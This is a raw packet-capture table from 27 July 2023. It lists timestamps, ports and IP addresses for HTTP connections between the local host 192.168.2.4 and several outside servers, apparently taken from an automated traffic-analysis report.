                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.951442003 CEST4973880192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.951442003 CEST4973880192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.951462984 CEST8049738122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.951517105 CEST8049738122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.951551914 CEST4973880192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.951553106 CEST8049738122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.951587915 CEST8049738122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.951628923 CEST4973880192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.951667070 CEST4973880192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.090277910 CEST804973972.251.233.245192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.090986013 CEST4973980192.168.2.472.251.233.245
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.092039108 CEST4973980192.168.2.472.251.233.245
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.103043079 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.111802101 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.119266033 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.119390011 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.119698048 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.131129026 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.132457972 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.132796049 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.135780096 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.151932001 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.191992044 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.192054987 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.192101955 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.192146063 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.192173004 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.192193031 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.192212105 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.192223072 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.192240000 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.192244053 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.192302942 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.192321062 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.192395926 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.193228960 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.193279982 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.193325996 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.193399906 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.193797112 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.204320908 CEST4974280192.168.2.454.161.222.85
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211446047 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211502075 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211548090 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211594105 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211623907 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211641073 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211657047 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211688995 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211699963 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211730003 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211735010 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211781979 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211797953 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211827993 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211827993 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211874962 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211914062 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211919069 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211935043 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211961031 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.211965084 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.212013006 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.212024927 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.212058067 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.212085009 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.212120056 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.212529898 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.212587118 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.212738991 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.212765932 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.212865114 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.212922096 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.212924004 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.212965965 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.212970972 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.213016987 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.213023901 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.213068008 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.231373072 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.231432915 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.231478930 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.231525898 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.231579065 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.231626034 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.231671095 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.231688976 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.231718063 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.231733084 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.231733084 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.231770039 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.233052969 CEST4974180192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.252227068 CEST8049741193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.301881075 CEST804968870.39.251.249192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.302910089 CEST4968880192.168.2.470.39.251.249
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.343600988 CEST804974254.161.222.85192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.343733072 CEST4974280192.168.2.454.161.222.85
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.350341082 CEST804973972.251.233.245192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.350584984 CEST804973972.251.233.245192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.350636005 CEST804973972.251.233.245192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.350697041 CEST4973980192.168.2.472.251.233.245
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.379307985 CEST4973980192.168.2.472.251.233.245
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.409878969 CEST4974280192.168.2.454.161.222.85
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.416604042 CEST4974380192.168.2.4154.203.14.100
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.467959881 CEST4974480192.168.2.4107.180.98.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.529867887 CEST804969159.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.530129910 CEST4969180192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.548765898 CEST804974254.161.222.85192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.548823118 CEST804974254.161.222.85192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.548934937 CEST4974280192.168.2.454.161.222.85
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.549011946 CEST4974280192.168.2.454.161.222.85
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.550048113 CEST4974280192.168.2.454.161.222.85
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.569684982 CEST4974580192.168.2.454.161.222.85
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.588401079 CEST804969862.122.190.121192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.588594913 CEST4969880192.168.2.462.122.190.121
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.604609966 CEST8049743154.203.14.100192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.604733944 CEST4974380192.168.2.4154.203.14.100
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.605199099 CEST4974380192.168.2.4154.203.14.100
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.626554966 CEST8049744107.180.98.101192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.626715899 CEST4974480192.168.2.4107.180.98.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.627047062 CEST4974480192.168.2.4107.180.98.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.637545109 CEST804973972.251.233.245192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.643074036 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.643134117 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.643184900 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.643233061 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.643279076 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.643326044 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.643372059 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.643408060 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.643460035 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.643500090 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.643507004 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.643546104 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.643554926 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.643557072 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.643599987 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.643640995 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.643743038 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.689054966 CEST804974254.161.222.85192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.709872007 CEST804974554.161.222.85192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.709995985 CEST4974580192.168.2.454.161.222.85
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.710905075 CEST4974580192.168.2.454.161.222.85
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.754771948 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.754873991 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.754921913 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.754966974 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.754992962 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.755028963 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.755044937 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.755044937 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.755089045 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.755141020 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.755188942 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.755198002 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.755234957 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.755258083 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.755284071 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.755413055 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.755461931 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.755601883 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.756097078 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.756143093 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.756172895 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.756187916 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.756232977 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.756242037 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.756294012 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.756294012 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.756310940 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.756383896 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.757069111 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.757133007 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.757179022 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.757220984 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.757225037 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.757249117 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.757249117 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.757271051 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.757272005 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.757318974 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.757982969 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.758027077 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.758066893 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.758130074 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.759942055 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.785419941 CEST8049744107.180.98.101192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.789397001 CEST8049744107.180.98.101192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.789510965 CEST4974480192.168.2.4107.180.98.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.789685011 CEST4974480192.168.2.4107.180.98.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.850089073 CEST804974554.161.222.85192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.850142956 CEST804974554.161.222.85192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.850227118 CEST4974580192.168.2.454.161.222.85
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.850805044 CEST4974580192.168.2.454.161.222.85
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.850912094 CEST4974580192.168.2.454.161.222.85
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864094973 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864182949 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864233017 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864311934 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864311934 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864342928 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864394903 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864407063 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864442110 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864456892 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864490986 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864504099 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864537954 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864552975 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864583015 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864604950 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864628077 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864659071 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.864694118 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.865381002 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.865430117 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.865489960 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.865525007 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.865549088 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.865561962 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.865593910 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.865613937 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.865647078 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.866357088 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.866420031 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.866468906 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.866470098 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.866511106 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.866517067 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.866563082 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.866570950 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.866622925 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.867315054 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.867364883 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.867377996 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.867408991 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.867438078 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.867455006 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.867466927 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.867500067 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.867511988 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.867561102 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.868222952 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.868304014 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.868321896 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.868372917 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.868387938 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.868422985 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.868422985 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.868451118 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.868491888 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.868515968 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.869260073 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.869311094 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.869337082 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.869357109 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.869366884 CEST4974080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.869404078 CEST8049740172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.869427919 CEST4974080192.168.2.4172.67.201.26
